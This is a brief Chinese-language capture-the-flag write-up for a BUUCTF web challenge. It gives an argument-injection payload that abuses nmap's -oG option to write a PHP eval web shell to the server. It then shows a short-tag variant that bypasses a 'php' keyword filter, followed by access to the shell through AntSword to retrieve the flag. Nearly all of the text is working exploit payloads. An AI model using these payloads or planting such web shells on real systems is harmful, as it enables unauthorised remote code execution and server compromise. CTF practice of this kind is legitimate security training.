和[BUUCTF 2018]Online Tool類似,直接用里面的payload
' <?php @eval($_POST["hack"]);?> -oG hack.php '
回顯hacker,經查,php被過濾,使用短標簽繞過
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
成功寫入
訪問一下
http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml
蟻劍連接一波,在根目錄下找到flag